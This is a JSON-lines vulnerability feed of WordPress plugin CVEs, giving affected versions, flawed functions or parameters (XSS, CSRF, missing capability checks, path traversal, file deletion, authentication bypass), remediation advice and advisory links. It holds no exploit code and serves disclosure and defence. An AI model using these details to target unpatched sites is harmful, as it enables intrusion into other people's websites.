{"CVE_ID":"CVE-2023-5048","slug":"contact-form-builder","versionImpact":"1.0.72","description":"The WDContactFormBuilder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Contact_Form_Builder' shortcode in versions up to, and including, 1.0.72 due to insufficient input sanitization and output escaping on 'id' user supplied attribute. This makes it possible for authenticated attackers with contributor level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7152253a-7bb8-4b5c-bffd-86e46df54b7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7152253a-7bb8-4b5c-bffd-86e46df54b7e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-builder\\\/tags\\\/1.0.72\\\/frontend\\\/views\\\/CFMViewForm_maker.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-builder\\\/tags\\\/1.0.72\\\/frontend\\\/views\\\/CFMViewForm_maker.php#L102\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6878","slug":"slick-social-share-buttons","versionImpact":"2.4.11","description":"The Slick Social Share Buttons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'dcssb_ajax_update' function in versions up to, and including, 2.4.11. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update the site options arbitrarily.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79a5c01d-3867-4b1e-b0ba-9a802f0bed92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79a5c01d-3867-4b1e-b0ba-9a802f0bed92?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slick-social-share-buttons\\\/tags\\\/2.4.11\\\/inc\\\/dcwp_admin.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slick-social-share-buttons\\\/tags\\\/2.4.11\\\/inc\\\/dcwp_admin.php#L49\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1285","slug":"page-builder-sandwich","versionImpact":"5.1.0","description":"The Page Builder Sandwich \u2013 Front End WordPress Page Builder Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'gambit_builder_save_content' function in all versions up to, and including, 5.1.0. This makes it possible for authenticated attackers, with subscriber access and above, to insert arbitrary content into existing posts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69d3d66c-5557-4fb4-8bd7-05d76d6b86ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69d3d66c-5557-4fb4-8bd7-05d76d6b86ab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-sandwich\\\/tags\\\/5.1.0\\\/class-page-builder-sandwich.php#L958\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-sandwich\\\/tags\\\/5.1.0\\\/class-page-builder-sandwich.php#L958\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7090","slug":"lh-add-media-from-url","versionImpact":"1.23","description":"The LH Add Media From Url plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018lh_add_media_from_url-file_url\u2019 parameter in all versions up to, and including, 1.23 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3461327-9195-48ed-b9c3-7b33198e9438?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3461327-9195-48ed-b9c3-7b33198e9438?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lh-add-media-from-url\\\/trunk\\\/lh-add-media-from-url.php#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lh-add-media-from-url\\\/trunk\\\/lh-add-media-from-url.php#L173\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lh-add-media-from-url\\\/trunk\\\/partials\\\/upload.php#L6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lh-add-media-from-url\\\/trunk\\\/partials\\\/upload.php#L6\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11224","slug":"parallax-image","versionImpact":"1.9","description":"The Parallax Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018position\u2019 parameter in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56e5f7c9-ad22-43b3-9bfe-0eea1f8040d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56e5f7c9-ad22-43b3-9bfe-0eea1f8040d3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/parallax-image\\\/tags\\\/1.9\\\/assets\\\/shortcode.php#L156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/parallax-image\\\/tags\\\/1.9\\\/assets\\\/shortcode.php#L156\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/parallax-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/parallax-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189649\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189649\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13753","slug":"ultimate-classified-listings","versionImpact":"1.4","description":"The Ultimate Classified Listings plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing or incorrect nonce validation on the update_profile function. This makes it possible for unauthenticated attackers to modify victim's email via a forged request, which might lead to account takeover, granted they can trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-classified-listings\\\/tags\\\/1.4\\\/classes\\\/class-shortcodes.php#L701\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-classified-listings\\\/tags\\\/1.4\\\/classes\\\/class-shortcodes.php#L701\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61365b95-da97-425d-a314-648b3d00236f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61365b95-da97-425d-a314-648b3d00236f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5686","slug":"paged-gallery","versionImpact":"0.7","description":"The Paged Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gallery' shortcode in all versions up to, and including, 0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paged-gallery\\\/trunk\\\/paged-gallery.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paged-gallery\\\/trunk\\\/paged-gallery.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc7dbdbe-fd0f-404b-9f9f-06e942f60a73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc7dbdbe-fd0f-404b-9f9f-06e942f60a73?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6691","slug":"sureforms","versionImpact":"1.7.3","description":"The SureForms \u2013 Drag and Drop Form Builder for WordPress plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the delete_entry_files() function in all versions up to, and including, 1.7.3. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sureforms\\\/trunk\\\/admin\\\/views\\\/entries-list-table.php#L661\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sureforms\\\/trunk\\\/admin\\\/views\\\/entries-list-table.php#L661\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3319753%40sureforms&new=3319753%40sureforms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3319753%40sureforms&new=3319753%40sureforms&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sureforms\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sureforms\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4658546-bf57-414b-a3c9-bf7a5692c5fe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4658546-bf57-414b-a3c9-bf7a5692c5fe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7965","slug":"cbx-restaurant-booking","versionImpact":"1.2.1","description":"The CBX Restaurant Booking WordPress plugin through 1.2.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13e0db0b-87c5-4cf0-b0a6-178bdf96991b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13e0db0b-87c5-4cf0-b0a6-178bdf96991b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2982","slug":"miniorange-login-openid","versionImpact":"7.6.4","description":"The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08ca186a-2486-4a58-9c53-03e9eba13e66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08ca186a-2486-4a58-9c53-03e9eba13e66?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2925914\\\/miniorange-login-openid\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2925914\\\/miniorange-login-openid\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-login-openid\\\/trunk\\\/mo-openid-social-login-functions.php#L107\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-login-openid\\\/trunk\\\/mo-openid-social-login-functions.php#L107\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2924863\\\/miniorange-login-openid\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2924863\\\/miniorange-login-openid\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/2326f41f-a39f-4fde-8627-9d29fff91443\\\/\",\"name\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/2326f41f-a39f-4fde-8627-9d29fff91443\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4040","slug":"payment-gateway-stripe-and-woocommerce-integration","versionImpact":"3.7.9","description":"The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the eh_callback_handler function in versions up to, and including, 3.7.9. This makes it possible for unauthenticated attackers to modify the order status of arbitrary WooCommerce orders.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2954934\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2954934\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef543c61-2acc-4b72-81ff-883960d4c7c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef543c61-2acc-4b72-81ff-883960d4c7c3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5767","slug":"sitetweet-tweets-user-behaviors-on-your-site-on-twitter","versionImpact":"0.2","description":"The sitetweet WordPress plugin through 0.2 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e4ba26b4-5f4f-4c9e-aa37-885b30ef8088\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e4ba26b4-5f4f-4c9e-aa37-885b30ef8088\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7032","slug":"clover-online-orders","versionImpact":"1.5.6","description":"The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'moo_deactivateAndClean' function in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to deactivate the plugin and drop all plugin tables from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a6b05b1-c649-4b72-b884-11fb83ec77f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a6b05b1-c649-4b72-b884-11fb83ec77f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/moo_OnlineOrders.php#L183\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/moo_OnlineOrders.php#L183\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/includes\\\/moo-OnlineOrders-deactivator.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/includes\\\/moo-OnlineOrders-deactivator.php#L29\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11198","slug":"gd-rating-system","versionImpact":"3.6.1","description":"The GD Rating System plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018extra_class\u2019 parameter in all versions up to, and including, 3.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66cad18d-a433-47f1-9cb6-c619c8717a0d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66cad18d-a433-47f1-9cb6-c619c8717a0d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gd-rating-system\\\/tags\\\/3.6.1\\\/d4plib\\\/plugin\\\/d4p.shortcodes.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gd-rating-system\\\/tags\\\/3.6.1\\\/d4plib\\\/plugin\\\/d4p.shortcodes.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gd-rating-system\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gd-rating-system\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189622\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189622\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22503","slug":"dzs-enable-debug","versionImpact":"1.0.13","description":"Cross-Site Request Forgery (CSRF) vulnerability in Digital Zoom Studio Admin debug wordpress \u2013 enable debug allows Cross Site Request Forgery.This issue affects Admin debug wordpress \u2013 enable debug: from n\/a through 1.0.13.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/dzs-enable-debug\\\/vulnerability\\\/wordpress-admin-debug-wordpress-enable-debug-plugin-1-0-13-cross-site-request-forgery-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/dzs-enable-debug\\\/vulnerability\\\/wordpress-admin-debug-wordpress-enable-debug-plugin-1-0-13-cross-site-request-forgery-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0859","slug":"post-and-page-builder","versionImpact":"1.27.6","description":"The Post and Page Builder by BoldGrid \u2013 Visual Drag and Drop Editor plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.27.6 via the template_via_url() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/BoldGrid\\\/post-and-page-builder\\\/pull\\\/638\\\/commits\\\/10e4d1d96fd2735379049259d15896fa6dd35471\",\"name\":\"https:\\\/\\\/github.com\\\/BoldGrid\\\/post-and-page-builder\\\/pull\\\/638\\\/commits\\\/10e4d1d96fd2735379049259d15896fa6dd35471\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-and-page-builder\\\/trunk\\\/includes\\\/class-boldgrid-editor-preview.php#L178\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-and-page-builder\\\/trunk\\\/includes\\\/class-boldgrid-editor-preview.php#L178\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old=3234175&old_path=post-and-page-builder%2Ftags%2F1.27.7%2Fincludes%2Fclass-boldgrid-editor-preview.php&new=3234175&new_path=post-and-page-builder%2Ftags%2F1.27.7%2Fincludes%2Fclass-boldgrid-editor-preview.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old=3234175&old_path=post-and-page-builder%2Ftags%2F1.27.7%2Fincludes%2Fclass-boldgrid-editor-preview.php&new=3234175&new_path=post-and-page-builder%2Ftags%2F1.27.7%2Fincludes%2Fclass-boldgrid-editor-preview.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-and-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-and-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/111a1e7f-bc87-4130-a0b2-422d0f98afb6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/111a1e7f-bc87-4130-a0b2-422d0f98afb6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5586","slug":"cpt-ajax-load-more","versionImpact":"1.6.0","description":"The WordPress Ajax Load More and Infinite Scroll plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 1.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cpt-ajax-load-more\\\/trunk\\\/includes\\\/class-cpt-alm-shortcodes.php#L126\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cpt-ajax-load-more\\\/trunk\\\/includes\\\/class-cpt-alm-shortcodes.php#L126\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cpt-ajax-load-more\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cpt-ajax-load-more\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5be80195-192a-4b53-9d10-4d877fa0afbe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5be80195-192a-4b53-9d10-4d877fa0afbe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4827","slug":"wp-tiles","versionImpact":"1.1.2","description":"The WP Tiles WordPress plugin through 1.1.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f2a922ac-6bc9-4caa-b1cc-9ca9cff4bd51\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f2a922ac-6bc9-4caa-b1cc-9ca9cff4bd51\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4383","slug":"wp-quick-front-end-editor","versionImpact":"5.5.","description":"The WP Quick FrontEnd Editor plugin for WordPress is vulnerable to page content injection in versions up to, and including, 5.5. This is due to missing capability checks in the plugin's page-editing functionality. This makes it possible for low-authenticated attackers, such as subscribers, to edit\/create any page or post on the blog.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5492bff-cfd9-41ed-a59b-4445d5e83e86?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5492bff-cfd9-41ed-a59b-4445d5e83e86?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-quick-front-end-editor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-quick-front-end-editor\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-vulnerabilities-in-wordpress-wp-quick-frontend-editor-plugin-unpatched\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-vulnerabilities-in-wordpress-wp-quick-frontend-editor-plugin-unpatched\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1602","slug":"shorten-url","versionImpact":"1.6.4","description":"The Short URL plugin for WordPress is vulnerable to stored Cross-Site Scripting via the 'comment' parameter due to insufficient input sanitization and output escaping in versions up to, and including, 1.6.4. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2931815\\\/shorten-url\\\/trunk\\\/shorten-url.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2931815\\\/shorten-url\\\/trunk\\\/shorten-url.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/shorten-url\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/shorten-url\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5f29f35-da79-4389-a0a5-a1be0b0b8996?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5f29f35-da79-4389-a0a5-a1be0b0b8996?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-31218","slug":"bulk-editor","description":"Cross-Site Request Forgery (CSRF) leading to Stored Cross-Site Scripting (XSS) vulnerability in realmag777 WOLF \u2013 WordPress Posts Bulk Editor and Manager Professional plugin <=\u00a01.0.6 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bulk-editor\\\/wordpress-wolf-wordpress-posts-bulk-editor-and-manager-professional-plugin-1-0-6-cross-site-scripting-xss-via-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bulk-editor\\\/wordpress-wolf-wordpress-posts-bulk-editor-and-manager-professional-plugin-1-0-6-cross-site-scripting-xss-via-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1095","slug":"control-block-patterns","versionImpact":"1.3.5.4","description":"The Build & Control Block Patterns \u2013 Boost up Gutenberg Editor plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the settings_export() function in all versions up to, and including, 1.3.5.4. This makes it possible for unauthenticated attackers to export the plugin's settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38f09a45-2b11-47c7-af16-c7f9c3a46e0e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38f09a45-2b11-47c7-af16-c7f9c3a46e0e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/control-block-patterns\\\/trunk\\\/classes\\\/Settings\\\/SettingsPage.php#L166\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/control-block-patterns\\\/trunk\\\/classes\\\/Settings\\\/SettingsPage.php#L166\",\"refsource\":\"\",\"tags\":[]}]"}
